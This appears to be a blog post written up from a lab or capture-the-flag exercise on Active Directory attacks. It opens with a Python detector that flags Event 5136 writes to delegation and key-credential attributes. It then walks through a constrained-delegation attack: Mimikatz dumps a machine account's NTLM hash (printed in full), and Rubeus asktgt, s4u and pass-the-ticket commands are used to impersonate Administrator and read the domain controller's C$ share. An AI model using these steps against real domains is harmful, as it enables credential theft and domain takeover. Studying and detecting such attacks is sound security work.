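# 'Audit Directory Service Changes' subcategory is enabled and the object's SACL audits writes.
SAMPLE_EVENTS = [
    {"EventID": "5136", "SubjectDomainName": "NOVICE", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=MrRobot,CN=Users,DC=novice,DC=com", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "helpdesk",
     "OperationType": VALUE_ADDED},
    {"EventID": "5136", "SubjectDomainName": "NOVICE", "SubjectUserName": "MrRobot",
     "ObjectDN": "CN=DC,OU=Domain Controllers,DC=novice,DC=com", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "AttributeValue": "<security descriptor naming EVILPC$>", "OperationType": VALUE_ADDED},
    {"EventID": "5136", "SubjectDomainName": "CERTIFIED", "SubjectUserName": "judith.mader",
     "ObjectDN": "CN=management service,CN=Users,DC=certified,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "AttributeValue": "<KeyCredential blob>", "OperationType": VALUE_ADDED},
    {"EventID": "5136", "SubjectDomainName": "NOVICE", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=WS01,CN=Computers,DC=novice,DC=com", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "AttributeValue": "<KeyCredential blob>", "OperationType": VALUE_ADDED},
]


def is_domain_controller(dn):
    return ",OU=Domain Controllers," in dn


def triage_5136(events):
    """Return one alert per sensitive attribute value added, graded by who wrote it and where."""
    alerts = []
    for ev in events:
        attr = ev.get("AttributeLDAPDisplayName", "")
        if ev.get("EventID") != "5136" or attr not in SENSITIVE_ATTRS:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue  # deletions (e.g. Certipy restoring the old key credentials) are not alerted
        subject = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}".lower()
        if subject in ALLOWLIST:
            severity = "info"      # expected admin activity, still worth keeping in the log
        elif attr == "msDS-AllowedToActOnBehalfOfOtherIdentity" and is_domain_controller(ev["ObjectDN"]):
            severity = "critical"  # delegation onto a DC is a direct path to DCSync
        else:
            severity = "high"
        alerts.append({"severity": severity, "subject": subject, "object": ev["ObjectDN"],
                       "attribute": attr, "why": SENSITIVE_ATTRS[attr]})
    return alerts


if __name__ == "__main__":
    for a in triage_5136(SAMPLE_EVENTS):
        print(f"[{a['severity'].upper()}] {a['subject']} wrote {a['attribute']} on {a['object']}")
```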

Constrained delegation attack against the Domain Controller

To impersonate the domain admin (Administrator) and access the DC's C$ share, the attack relies on two key Kerberos protocol extensions: S4U2Self (Service for User to Self) and S4U2Proxy (Service for User to Proxy).

  • Prerequisite: obtain the machine account's credentials

    Action: Mimikatz was used to dump the NTLM hash (f496fe749b403f432a5e2c0d49113a29) of the machine account MSSQLSERVER$ from memory on 172.22.2.16.

    Principle: only with the credentials of that service (machine) account can a delegation request be sent to the KDC (Key Distribution Center) in that service's name.

  • Step 1: request a TGT for the machine account

    Action: run Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:f496...

    Principle: with the NTLM hash just obtained (RC4 encryption), send a normal-looking AS-REQ to the domain controller and exchange it for the TGT (Ticket Granting Ticket) of the MSSQLSERVER$ machine account.

  • Step 2: S4U2Self (the service requests a ticket to itself on behalf of the user)

    Action: this happens under the hood of the Rubeus.exe s4u /impersonateuser:Administrator ... command.

    Principle: MSSQLSERVER$ presents its own TGT and tells the KDC: "the domain admin Administrator is accessing me; give me a TGS (service ticket) for Administrator to myself". Because of how S4U2Self works, the KDC does not need to verify Administrator's password and simply returns a TGS for Administrator to MSSQLSERVER$. This ticket carries the forwardable flag.

  • Step 3: S4U2Proxy (request a ticket to another service on behalf of the user)

    Action: request the specified service with /msdsspn:CIFS/DC.xiaorang.lab /ptt

    Principle: MSSQLSERVER$ contacts the KDC again: "I now want to access the DC's CIFS service (file sharing) on behalf of Administrator; here is the forwardable TGS for Administrator that you just gave me". The KDC checks the Active Directory attributes and finds that MSSQLSERVER$ is indeed configured with constrained delegation to CIFS/DC.xiaorang.lab. The check passes, and the KDC issues the final TGS for Administrator to the DC's CIFS service and returns it to MSSQLSERVER$.

  • Step 4: inject and use the credential

    Action: Rubeus's /ptt (Pass-The-Ticket) option injects the high-privilege TGS just obtained straight into the current session's memory.

    Principle: the current system context now holds a legitimate ticket for the domain admin to access the DC's share, so dir \\DC.xiaorang.lab\c$ lists the share, flag04.txt can be read, and the takeover of the whole domain is complete.



http://example.com/2026/02/18/ad攻击小记/
Author: Skyarrow
Posted on: February 18, 2026